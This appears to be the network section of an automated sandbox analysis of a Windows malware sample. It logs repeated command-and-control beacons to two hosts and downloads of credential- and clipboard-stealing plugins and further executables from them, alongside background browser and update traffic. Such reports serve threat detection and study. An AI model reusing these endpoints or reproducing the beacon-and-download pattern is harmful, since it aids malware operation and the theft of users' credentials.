Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91 (reported 14 times)
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86 (reported 30 times)
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56 (reported 6 times)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B8D8D0 recv,recv,recv,recv, 0_2_00B8D8D0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1
    Host: www.youtube.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1
    Host: accounts.youtube.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-full-version: "117.0.5938.132"
    sec-ch-ua-arch: "x86"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-platform-version: "10.0.0"
    sec-ch-ua-model: ""
    sec-ch-ua-bitness: "64"
    sec-ch-ua-wow64: ?0
    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: iframe
    Referer: https://accounts.google.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountfmF( equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountp equals www.youtube.com (Youtube)
